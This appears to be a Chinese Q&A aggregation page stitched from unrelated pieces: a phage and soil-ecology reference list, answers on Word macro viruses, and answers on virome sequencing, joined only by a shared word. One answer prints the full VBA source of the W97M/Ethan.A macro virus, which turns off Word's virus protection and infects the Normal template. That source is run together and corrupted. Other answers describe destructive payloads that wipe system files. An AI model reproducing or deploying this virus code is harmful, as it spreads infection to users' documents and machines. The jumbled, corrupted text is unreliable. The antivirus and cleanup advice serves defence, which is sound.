Lenoir L, Persson T, BengtssonJ, et al. Bottom–up or top–down control in forest soil microcosms? Effects ofsoil fauna on fungal biomass and C/N mineralization. Biology and Fertility ofSoils, 2007, 43(3): 281-294.

Lin DM, Koskella B, Lin HC.2017. Phage therapy: an alternative to antibiotics in the age of multi-drugresistance. World J Gastrointest Pharmacol Ther 8:162-173.

Lu TK, Koeris MS. The nextgeneration of bacteriophage therapy. Curr Opin Microbiol 2011; 14: 524e31.

Matsuzaki S, Uchiyama J,Takemura-Uchiyama I, Daibata M. Perspective: The age of the phage. Nature. 2014May 1;509(7498):S9. pii: 509S9a.

O』Flaherty S, Ross RP, CoffeyA. Bacteriophage and their lysins for elimination of infectious bacteria[J].FEMS Microbiol Rev 2009; 33:801e19

Ran NP, Daniel G, Ayman K, etal. Successful Treatment of Antibiotic-resistant, Poly-microbial Bone InfectionWith Bacteriophages and Antibiotics Combination[J]. Clinical InfectiousDiseases, 2019(11):11.

Rhoads DD, Wolcott RD,Kuskowski MA, Wolcott BM, Ward LS, Sulakvelidze A. Bacteriophage therapy ofvenous leg ulcers in humans: results of a phase I safety trial. J Wound Care2009; 18:237e43

Thomas W C, David W G S,Stephen M T, et al. Top-down control of soil fungal community composition by aglobally distributed keystone consumer. Ecology, 2013, 94(11): 2518-2528.

Thingstad TF, Lignell R.Theoretical models for the control of bacterial growth rate, abundance,diversity and carbon demand. Aquatic Microbial Ecology, 1997, 13(1): 19-27.

Ye Mao, Sun Mingming, HuangDan, et al. A review of bacteriophage therapy for pathogenic bacteriainactivation in the soil environment. Environment International, 2019, 129:488-496.

Yu P, Mathieu J, Yang Y,Alvarez PJJ. Suppression of Enteric Bacteria by Bacteriophages: Importance ofPhage Polyvalence in the Presence of Soil Bacteria[J]. Environ Sci Technol.2017 May 2;51(9):5270-5278.

Wright A, Hawkins CH, AnggardEE, Harper DR. A controlled clinical trial of a therapeutic bacteriophagepreparation in chronic otitis e to antibiotic-resistant Pseudomonasaeruginosa; a preliminary report of efficiency. Clin Otolaryngol 2009; 34:349e57.

Weinbauer MG. Ecology ofprokaryotic viruses. FEMS Microbiology Reviews, 2004, 28(2), 127-181.

王光華.掀開土壤生物「暗物質」——土壤病毒的神秘面紗[J].中國科學院院刊,2017,32(06):575-584.

❸ 宏病毒是什麼,在電子表格中怎麼樣清除

宏是Word 里一個非常有用的工具，但也是Word 的安全漏洞之一。有一些惡意的人利用宏製造宏病毒，給別人帶來麻煩。宏病毒是一種寄存在文檔或模板的宏中的計算機病毒。一旦打開這樣的文檔，宏病毒就會被激活，轉移到計算機上，並駐留在 Normal 模板上。從此以後，所有自動保存的文檔都會「感染」上這種宏病毒，而且如果其他用戶打開了感染病毒的文檔，宏病毒又會轉移到他的計算機上。1 宏病毒宏病毒已經成為發展最快和傳播最迅速的病毒。美國國際計算機安全協會ICSA 的《ICSA 1998 病毒流行調查報告》表明宏病毒獨占 1998 年十大病毒感染事件的72%，在十大病毒中佔了五席交椅： WM/Concept、WM/Cap、WM/Wazzu、WM/Npad 和XM/Laroux。根據 DataFellow 公司每天特徵碼升級的F-Macro 所檢測到的宏病毒數目，至1998 年12 月達到了3,332 個，而在1997 年12 月才是1,821 個，增長率為83.0%。而且F-Macro 並不能檢測到所有宏病毒。在1998 年12 月出現了Word Class Object 的宏病毒，是由VicodinES 編寫的。1.1 宏病毒許多應用程序都允許在用戶的資料庫中包含一些宏，隨著應用軟體的進步，宏語言的功能也越來越強大，其中微軟的Word Visual Basic for Application（VBA）已經成為應用軟體宏語言的標准。利用宏語言，可以實現幾乎所有的操作，還可以實現一些應用軟體原來沒有的功能。每個模板或數據文件中，都可以包含宏命令。有不少應用軟體允許用戶利用宏修改軟體菜單的功能，並可以將某一個宏加入到菜單中或設置成自動運行的命令。利用這個功能，宏就可以修改軟體本身的功能，從而將軟體本身修改為病毒傳播的源泉。宏病毒就是利用Word VBA 進行編寫的一些宏，這些宏可以自動運行，干擾用戶工作，輕則降低工作效率，重則破壞文件，使用戶遭受巨大損失。一旦打開含有宏病毒的文檔，其中的宏就會被執行，於是宏病毒就會被激活，轉移到計算機上，並駐留在Normal 模板上。從此以後，所有自動保存的文檔都會「感染」上這種宏病毒，而且如果其他用戶打開了感染病毒的文檔，宏病毒又會轉移到他的計算機上。宏病毒成為傳播最快的病毒，其原因有三個：第一，現在用戶幾乎對可執行文件病毒和引導區病毒已經有了比較一致的認識，對這些病毒的防治都有一定的經驗，許多公司、企業對可執行文件和磁碟的交換都有嚴格的規定。但對宏病毒的危害還沒有足夠的認識，而現在主要的工作就是交換數字文件，因此使宏病毒得到迅速傳播。第二，現在的查病毒、防病毒軟體主要是針對可執行文件和磁碟引導區設計的，一般都假定數據文件中不會存在病毒，而人們相信查病毒軟體的結論，從而使隱藏在數據文件中的病毒成為漏網之魚。第三，CD-ROM 和Interenet 使病毒的傳播速度大大加快。如果某個文檔中包含了宏病毒，我們稱此文檔感染了宏病毒；如果Word 系統中的模板包含了宏病毒，我們稱Word 系統感染了宏病毒。Word 2000 無法掃描軟盤、硬碟或網路驅動器上的宏病毒（要得到這種保護，需要購買和安裝專門的防病毒軟體）。但當打開一個含有可能攜帶病毒的宏的文檔時，它能夠顯示宏警告信息。這樣就可選擇打開文檔時是否要包含宏，如果希望文檔包含要用到的宏（例如，單位所用的定貨窗體），打開文檔時就包含宏。如果您並不希望在文檔中包含宏，或者不了解文檔的確切來源。例如，文檔是作為電子郵件的附件收到的，或是來自網路或不安全的Internet 節點。在這種情況下，為了防止可能發生的病毒傳染，打開文檔過程中出現宏警告提示時最好選擇【取消宏】。Word 軟體包安裝後，系統中包含有關於宏病毒防護的選項，其默認狀態是允許【宏病毒保護】復選框。如果願意，可以終止系統對文檔宏病毒的檢查。當Word 顯示宏病毒警告信息時，清除【在打開帶有宏或自定義內容的文檔時提問】復選框。或者關閉宏檢查：單擊【工具】菜單中的【宏】命令，再從級聯菜單中選擇【安全性】命令，出現【安全性】對話框，選擇【安全級】選項卡，將安全級別設為【無】。不過一般建議用戶不要取消宏病毒防護功能，否則會失去這道防護宏病毒的天然屏障。1.2 宏病毒示例為了更好地理解宏病毒， 我們仔細分析一下宏病毒 W97M/Ethan.A。下面是該病毒的代碼。Private Sub Document_Close（）On Error Resume Nexts = ActiveDocument.SavedApplication.EnableCancelKey = Not -1With Options: .ConfirmConversions = 0: .VirusProtection= 0: .SaveNormalPrompt = 0: End WithRandomizeIf Dir（"c:\ethan.___", 6） = "" ThenOpen "c:\ethan.___" For Output As #1For i = 1 To MacroContainer.VBProject.VBComponents.Item（1）.CodeMole.CountOfLinesa = MacroContainer.VBProject.VBComponents.Item（1）.CodeMole.Lines（i, 1）Print #1, aNext iClose #1SetAttr "c:\ethan.___", 6End IfIf Dir（"c:\class.sys"） <>"" Then Kill "c:\class.sys"If NormalTemplate.VBProject.VBComponents.Item（ 1 ） .CodeMole.Lines （ 1, 1 ） <>"Private SubDocument_Close（）" ThenSet t = NormalTemplate.VBProject.VBComponents.Item（1）ElseIf ActiveDocument.VBProject.VBComponents.Item（ 1 ） .CodeMole.Lines （ 1, 1 ） <>"Private SubDocument_Close（）" ThenSet t = ActiveDocument.VBProject.VBComponents.Item（1）Elset = ""End IfIf t <>"" ThenOpen "c:\ethan.___" For Input As #1If LOF（1） = 0 Then GoTo qi = 1Do While Not EOF（1）Line Input #1, at.CodeMole.InsertLines i, ai = i + 1Loopq:Close #1If Rnd < 0.3 Then With Dialogs（ wdDialogFileSummaryInfo ） : .Title = "EthanFrome": .Author = "EW/LN/CB": .Keywords ="Ethan": .Execute: End WithIf Left（ActiveDocument.Name, 8） <>"Document" ThenActiveDocument.SaveAsFileName:=ActiveDocument.FullNameEnd IfIf ActiveDocument.Saved <>s Then ActiveDocument.Saved= sEnd Sub W97M/Ethan.A 是一種寄生型宏病毒，由一個宏組成，能夠感染 Word 系統中的文檔和模板。在感染過程中，W97M/Ethan.A 使用一種特殊的演算法，從自己的源文件向宿主文件傳送病毒代碼，在源文件中存放的是以VBA 代碼形式存放的病毒程序。一旦感染成功，W97M/Ethan.A 會刪除自身的有關文件，隱藏蹤跡，並將感染所有訪問過的Word 文件。在被感染的Word 文件中，大概有三成幾率的文件屬性會被病毒更改，其標題會被改為「Ethan Frome」，而作者會被改為「EW/LN/CB」。如果發現上述特徵，則說明此文檔已被W97M/Ethan.A 宏病毒感染。對已感染的文檔進行操作，可能會出現以下問題：（1）在存儲文檔時，無法以Word 文檔格式存儲，而只能存儲為 Word 模板格式。（2）在打開文檔時，Word 系統會向用戶詢問文檔的開啟密碼，否則無法訪問該文件。（3）在清除了宏病毒之後，仍然看不到Word 系統中的某些命令或選項，它們可能已被宏病毒刪除。消息來源:中國信用財富網 http://www.creding.com

❹ 宏基因組和宏病毒組的區別是什麼

①.
宏基因組是研究所有微生物，病毒佔比很少，在宏基因組中研究病毒組就像是大海撈針。宏病毒組的方法就像是用吸鐵石，把宏基因組中病毒組部分吸出來，只看病毒就能避免宿主、細菌序列的影響。另外，宏病毒組分析流程和宏基因組有很大區別。
②.
病毒宏基因組測序又稱宏病毒組，是在宏基因組學理論的基礎上，結合現有的病毒分子生物學檢測技術而興起的一個新的學科分支。 宏病毒組直接以環境中所有病毒的遺傳物質為研究對象，鑒定環境中的病毒組成， 是一種發現新病毒、 病毒感染預警和控制的手段， 在病毒的起源和進化模式、遺傳多樣性和地理分布等研究方面也具有重要意義。
網路或微信搜索「基因幫」，獲取更多文章咨詢、行業進展以及病毒組相關技術。

❺ 在excel中「宏」是什麼意思有什麼作用

宏可以做什麼
所有你想同時完成的事情都可以讓宏來一次完成，並且所有會不斷重復的命令（比如說話或其他動作）都可以事先宏裡面定義好

1、什麼是宏？

宏是微軟公司為其OFFICE軟體包設計的一個特殊功能，目的是讓用戶文檔中的一些任務自動化。OFFICE中的WORD和EXEAL都有宏。在下面的討論中我們以WORD為例。

如果在Word中重復進行某項工作，可用宏使其自動執行。宏是將一系列的Word命令和指令組合在一起，形成一個命令，以實現任務執行的自動化。您可創建並執行一個宏，以替代人工進行一系列費時而重復的 Word操作。

以下是宏的一些典型應用：

加速日常編輯和格式設置

組合多個命令

使對話框中的選項更易於訪問

使一系列復雜的任務自動執行

Word提供了兩種創建宏的方法：宏錄制器和Visual Basic編輯器。

宏錄制器可幫助您開始創建宏。Word在Visual Basic for Applications編程語言中把宏錄制為一系列的Word命令。

可在Visual Basic編輯器中打開已錄制的宏，修改其中的指令。也可用Visual Basic編輯器創建包括Visual Basic指令的非常靈活和強有力的宏。

您可將宏保存到模板或文檔中。在默認的情況下，Word將宏存貯在 Normal模板中，以便所有的Word文檔均能使用。注意這一特點幾乎為所有的宏病毒所利用
2、什麼是宏病毒？

宏病毒是一種寄存在文檔或模板的宏中的計算機病毒。一旦打開這樣的文檔，其中的宏就會被執行，於是宏病毒就會被激活，轉移到計算機上，並駐留在Normal模板上。從此以後，所有自動保存的文檔都會 「感染」上這種宏病毒，而且如果其他用戶打開了感染病毒的文檔，宏病毒又會轉移到他的計算機上。

如果某個文檔中包含了宏病毒，我們稱此文檔感染了宏病毒；如果 WORD系統中的模板包含了宏病毒，我們稱WORD系統感染了宏病毒。

雖然OFFICE97/Word97無法掃描軟盤、硬碟或網路驅動器上的宏病毒（要得到這種保護，需要購買和安裝專門的防病毒軟體）。但當打開一個含有可能攜帶病毒的宏的文檔時，它能夠顯示宏警告信息。

這樣就可選擇打開文檔時是否要包含宏，如果希望文檔包含要用到的宏（例如，單位所用的定貨窗體），打開文檔時就包含宏。

如果您並不希望在文檔中包含宏，或者不了解文檔的確切來源。例如，文檔是作為電子郵件的附件收到的，或是來自網路或不安全的 Internet節點。在這種情況下，為了防止可能發生的病毒傳染，打開文檔過程中出現宏警告提示時最好選擇「取消宏」。

OFFICE97軟體包安裝後，系統中包含有關於宏病毒防護的選項，其默認狀態是允許「宏病毒保護」復選框。如果願意，您可以終止系統對文檔宏病毒的檢查。當Word顯示宏病毒警告信息時，清除「在打開帶有宏或自定義內容的文檔時提問」復選框。或者關閉宏檢查：單擊「工具」菜單中的「選項」命令，再單擊「常規」選項卡，然後清除「宏病毒保護」復選框。

不過我強烈建議您不要取消宏病毒防護功能，否則您會失去這道防護宏病毒的天然屏障。

二、宏病毒的判斷方法

雖然不是所有包含宏的文檔都包含了宏病毒，但當有下列情況之一時，您可以百分之百地斷定您的OFFICE文檔或OFFICE系統中有宏病毒：

1、在打開「宏病毒防護功能」的情況下，當您打開一個您自己寫的文檔時，系統會會彈出相應的警告框。而您清楚您並沒有在其中使用宏或並不知道宏到底怎麼用，那麼您可以完全肯定您的文檔已經感染了宏病毒。

2、同樣是在打開「宏病毒防護功能」的情況下，您的OFFICE文檔中一系列的文件都在打開時給出宏警告。由於在一般情況下我們很少使用到宏，所以當您看到成串的文檔有宏警告時，可以肯定這些文檔中有宏病毒。
3、如果軟體中關於宏病毒防護選項啟用後，不能在下次開機時依然保存。WORD97中提供了對宏病毒的防護功能，它可以在「工具/選項/常規」中進行設定。但有些宏病毒為了對付OFFICE97中提供的宏警告功能，它在感染系統（這通常只有在您關閉了宏病毒防護選項或者出現宏警告後您不留神選取了「啟用宏」才有可能）後，會在您每次退出 OFFICE時自動屏蔽掉宏病毒防護選項。因此您一旦發現:您的機器中設置的宏病毒防護功能選項無法在兩次啟動WORD之間保持有效，則您的系統一定已經感染了宏病毒。也就是說一系列WORD模板、特別是normal.dot 已經被感染。

鑒於絕大多數人都不需要或著不會使用「宏」這個功能，我們可以得出一個相當重要的結論：如果您的OFFICE文檔在打開時，系統給出一個宏病毒警告框，那麼您應該對這個文檔保持高度警惕，它已被感染的幾率極大。注意：簡單地刪除被宏病毒感染的文檔並不能清除OFFICE系統中的宏病毒！

三、宏病毒的防治和清除

1、首選方法：用最新版的反病毒軟體清除宏病毒。使用反病毒軟體是一種高效、安全和方便的清除方法，也是一般計算機用戶的首選方法。但是宏病毒並不象某些廠商或麻痹大意的人那樣認為的有所謂「廣譜」的查殺軟體，這方面的突出例子就是ETHAN宏病毒。

ETHAN宏病毒相當隱蔽，比如您使用KV300 Z+、RAV V9.0(11)、 KILL 85.03等反病毒軟體（應該算比較新的版本了）都無法查出它。此外這個宏病毒能夠悄悄取消WORD中宏病毒防護選項，並且某些情況下會把被感染的文檔置為只讀屬性，從而更好地保存了自己。

因此，對付宏病毒應該和對付其它種類的病毒一樣，也要盡量使用最新版的查殺病毒軟體。無論你使用的是何種反病毒軟體，及時升級是非常重要的。比如雖然KV300 Z+版不能查殺ETHAN宏病毒，但最新推出的KV300 Z++已經可以查殺它。

2、應急處理方法：用寫字板或WORD 6.0文檔作為清除宏病毒的橋梁。如果您的WORD系統沒有感染宏病毒，但需要打開某個外來的、已查出感染有宏病毒的文檔，而手頭現有的反病毒軟體又無法查殺它們，那麼您可以試驗用下面的方法來查殺文檔中的宏病毒：打開這個包含了宏病毒的文檔（當然是啟用WORD中的「宏病毒防護」功能並在宏警告出現時選擇「取消宏」），然後在「文件」菜單中選擇「另存為」，將此文檔改存成寫字板（RTF）格式或WORD6.0格式。

在上述方法中，存成寫字板格式是利用RTF文檔格式沒有宏，存成 WORD 6.0格式則是利用了WORD97文檔在轉換成WORD6.0格式時會失去宏的特點。寫字板所用的rtf格式適用於文檔中的內容限於文字和圖片的情況下，如果文檔內容中除了文字、圖片外還有圖形或表格，那麼按 WORD6.0格式保存一般不會失去這些內容。

存檔後應該檢查一下文檔的完整性，如果文檔內容沒有任何丟失，並且在重新打開此文檔時不再出現宏警告則大功告成。

❻ 宏病毒組技術與宏基因組有什麼不同嗎

用宏基因組來研究病毒是前幾年用的比較多的方法，但是缺點很明顯，宏基因組數據95%以上為宿主基因組污染，而細菌基因組DNA含量是病毒DNA的15倍左右，因此在剩下的不足5%，甚至通常不到1%的數據中，病毒DNA的reads比例也非常低，造成檢測到的病毒DNA遠低於樣品中實際的病毒水平。由此可見，通過宏基因組的數據對病毒進行研究，會造成對病毒組認識的偏差。因而，去除宿主和細菌DNA後，單獨對病毒組進行研究非常有必要。

所以利用宏病毒組的方法來研究病毒的優勢就非常明顯，也越來越受到相關科研團隊的關注。宏病毒組的特點是只對樣本中的病毒組序列進行研究，這樣的話就避免掉了宿主以及細菌序列的影響，能夠極大的提高數據的利用率。

然而，病毒組數據分析也面臨如下挑戰：（1）由於病毒非常小、進化速度快且難於培養，因此對病毒的研究相對困難。此外病毒缺乏類似於細菌16S rRNA基因序列的系統發育標記，對於環境病毒組的研究變得更為復雜。要對環境樣本中的所有病毒進行研究，不可避免的會受到樣本中其他物種DNA的影響；（2）病毒資料庫不夠豐富，病毒群落的基本結構和功能性研究還比較難。

由於人體各個部分的微環境不同，因此不同部位的病毒組均存在差異。其次，年齡、飲食習慣以及宏基因組中的其他組分等因素也會影響病毒組的組分構成。利用二代測序技術對病毒組進行研究，不僅可以在健康人群和患病個體中發現新的病毒，也可以研究特定疾病與病毒的關系。病毒組研究最有意思的發現之一是病毒與微生物組中的其他組分相互作用，尤其是細菌。病毒與細菌之間的相互影響可以增強或減弱抗病毒免疫反應從而控制病毒感染。這種影響是相互的，病毒也可以反過來調控細菌感染。對於在宿主特定遺傳環境下病毒與其他微生物的相互作用及其對病人健康狀態的影響的研究才剛剛起步，有待進一步深入，但目前的研究結果表明病毒及其他微生物對免疫反應的調節會影響感染的結果。
近兩年，許多科學家越來越多的開始關注病毒組，在實驗技術的改進和資料庫的擴充上有重要的進展。但總體來說，目前病毒組研究的報道要麼是基於人類基因組計劃產出的全基因組測序數據，要麼樣本量有限，還有許多未知的領域有待探索。
想了解更多關於「宏病毒組」的相關信息，網路或微信搜索「基因幫」。

❼ 宏病毒基因測序和宏病毒組是一樣的嗎

一樣的。病毒宏基因組測序又稱宏病毒組（Virome），是在宏基因組學理論的基礎上，結合現有的病毒分子生物學檢測技術而興起的一個新的學科分支。 宏病毒組直接以環境中所有病毒的遺傳物質為研究對象，鑒定環境中的病毒組成， 是一種發現新病毒、 病毒感染預警和控制的手段， 在病毒的起源和進化模式、遺傳多樣性和地理分布等研究方面也具有重要意義。

❽ 我最近想做宏病毒組相關的課題，有人知道宏病毒組生信分析主要分析那些東西

1.真核病毒與噬菌體分類
2.噬菌體宿主預測
3.病毒組成分析
4.α，β多樣性分析
5.PCA/PCoA/NMDS/聚類分析
6.組間差異/LEfSe分析
7.Core virus分析
8.病毒豐度分析
9.DESeq差異病毒篩選
想了解更多關於「宏病毒組」的相關信息，網路或微信搜索「基因幫」。

❾ 宏病毒的分析

宏病毒傳播途徑主要有：
1，軟盤交流染毒文檔文件；
2，硬碟染毒，處理的文檔文件必將染毒；
3，光碟攜帶宏病毒；
4，Internet上下載染毒文檔文件；
5，BBS交流染毒文檔文件；
6，電子郵件的附件夾帶病毒。
兩支宏病毒分析
1，Nuclear宏病毒
這是一個對操作系統文件和列印輸出有破壞功能的宏病毒。這個宏病毒中包含以下病毒宏：sertPayloadPayload這些宏是只執行（Execute-only）宏。
Nuclear宏病毒造成的破壞現象為：
（1）打開一個染毒文檔並列印的時候，它會在您列印的最後一段加上「STOPALLFRENCHNUCLEARTESTING
INTHEPACIFIC！」，這個現象是在每分鍾的55秒～60秒之間操作列印時發生。
（2）如果在每天17:00～18:00之間打開一個染毒文檔，Nuclear病毒會將PH33R病毒傳染到計算機上，這是個駐留型病毒。
（3）在每年的4月5日，該病毒會將計算機上IO.SYS和MSDOS.SYS文件清零，並且刪除C盤根目錄上的COMMAND. COM文件。一旦病毒發作，MSDOS就不可能被引導，計算機將陷入癱瘓。
2，台灣一號病毒
台灣一號病毒會在每月的13日影響您正常使用Word文檔和編輯器。它包含以下病毒宏：AutoCloseAutoNewAutoOpen這些宏是可被編輯宏。在病毒宏中含有如下的語句：IfDay(Now())=13Then...這條語句與13日有關。台灣一號病毒造成的危害是：在每月13日，若用戶使用Word打開一個帶毒的文檔（模板）時，病毒會被激發。激發時的現象是：在屏幕正中央彈出一個對話框，該對話框提示用戶做一個心算題，如做錯，它將會無限制地打開文件，直至Word內存不夠，Word出錯為止；如心算題做對，會提示用戶「什麼是巨集病毒（宏病毒）？」，回答「我就是巨集病毒」，再提示用戶：「如何預防巨集病毒？」，回答是「不要看我」。

❿ 我想做病毒組相關的課題，病毒組研究的難點有哪些方面有誰知道嗎

①.病毒組研究的滯後主要是因為科學家們對病毒組的重要性的認識晚於對細菌的認識，以及缺乏成熟的病毒組研究技術。
（1）病毒實驗難：由於病毒非常小、進化速度快且難於培養，因此對病毒的研究相對困難。此外病毒缺乏類似於細菌16S rRNA基因序列的系統發育標記，對於環境病毒組的研究變得更為復雜。要對環境樣本中的所有病毒進行研究，不可避免的會受到樣本中其他物種DNA的影響。
（2）生信分析難：宏基因組學方法已經成為當下研究微生態最熱門的方法，與宏基因組類似，宏病毒組學也成為病毒生態學研究的主體。然而，將宏基因組技術應用於病毒組學研究時所產生的結果及對結果的解讀仍存在一些問題。例如，在提取VLPs的過程中，游離的、可活躍復制的噬菌體顆粒成為分析的重點，限制了部分溫和噬菌體DNA信息的獲取。由於提取的DNA水平較低，擴增過程可能會漏掉某些含量極低的噬菌體類型，這會使獲得的病毒組信息產生偏差。盡管獨立於培養的方法減輕了繁雜的實驗工作，並能獲得更大量的信息，但研究者必須使用其他生物信息學方法來間接推斷病毒的宿主范圍信息你也可以網路下。